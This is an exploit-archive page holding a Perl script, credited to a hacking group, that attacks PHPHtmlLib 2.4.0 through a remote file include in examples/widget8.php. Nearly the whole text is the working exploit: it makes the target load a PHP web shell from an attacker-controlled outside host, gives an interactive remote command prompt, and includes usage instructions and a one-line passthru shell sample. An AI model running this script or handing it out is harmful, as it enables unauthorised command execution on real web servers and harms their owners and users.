Home / os / solaris

phphtmllib-rfi.txt

Posted on 08 May 2007

#!/usr/bin/perl use LWP::UserAgent; #/* #+************************************************************** #- AYYILDIZ TEAM // AYYILDIZ.ORG #+ #+************************************************************** #+ #- PHPHtmlLib <= 2.4.0 Remote File Include Exploit #+ #+************************************************************** #+ #- [Script name: PHPHtmlLib 2.4.0 #- [Script site: http://phphtmllib.newsblob.com/downloads/files/phphtmllib-2.4.0.tgz #+ #+************************************************************** #+ #- Coded by iLker Kandemir #+ #- Contact: ilkerkandemir<at>mynet<dot>com #- #- info: */ Siz Yokken AYYILDIZ Vardi */ #+ #+************************************************************** #+ #- tnx: h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann And AYYILDIZ.ORG #- #- h0tturk.com, expw0rm.com, turkistiklal.com, evilc0der.com #! #+ #+************************************************************** # usage: # perl exploit.pl <PHP Locaction> <shell location> <shell cmd> # # perl exploit.pl http://site.com/[PHP_Path]/ http://site.com/cmd.txt cmd # # cmd shell example: <?passthru($_GET[cmd]);?> # # cmd shell variable: ($_GET[cmd]); # $ayt = $ARGV[0]; $aytcmd = $ARGV[1]; $kumanda = $ARGV[2]; if($ayt!~/http:/// || $aytcmd!~/http:/// || !$kumanda){usage()} head(); while() { print "[shell] $"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$ayt. '/examples/widget8.php?phphtmllib='.$aytcmd.'?&'.$kumanda.'='.$cmd)or die " CouldNot connect "; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[ ]/[&#234;]/; if (!$cmd) {print " Enter a Command "; $return ="";} elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot executea blank command in <b>/) {print " Could Not Connect to cmd Host or Invalid Command Variable ";exit} elsif ($return =~/^<br./>.<b>Warning/) {print " Invalid Command "} if($return =~ /(.+)<br./>.<b>Warning.(.+)<br./>.<b>Warning/) { $finreturn = $1; $finreturn=~ tr/[&#234;]/[ ]/; print " $finreturn "; last; } else {print "[shell] $";}}}last; sub head() { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "; print "+ AYYILDIZ TEAM // AYYILDIZ.ORG + "; print "+ PHPHtmlLib <= Remote File Include Exploit + "; print "+ AYYILDIZ.ORG + "; print "+ iLker Kandemir [ O Bir Dunya Markasi ] + "; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "; } sub usage() { head(); print " Usage: perl exploit.pl <PHP Locaction> <shell location> <shell cmd> "; print " <PPHP Locaction> - Full path to PHP ex: http://www.xxx-site.com/examples "; print " <shell location> - Path to cmd Shell e.g http://www.xxx-host.com/cmd.txt "; print " <shell cmd> - Command variable used in php shell "; print " ============================================================================ "; print " by: iLker Kandemir "; print " ilkerkandemir@mynet.com "; print " Thnx:h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann "; print " ============================================================================ "; exit();

 

TOP

Malware :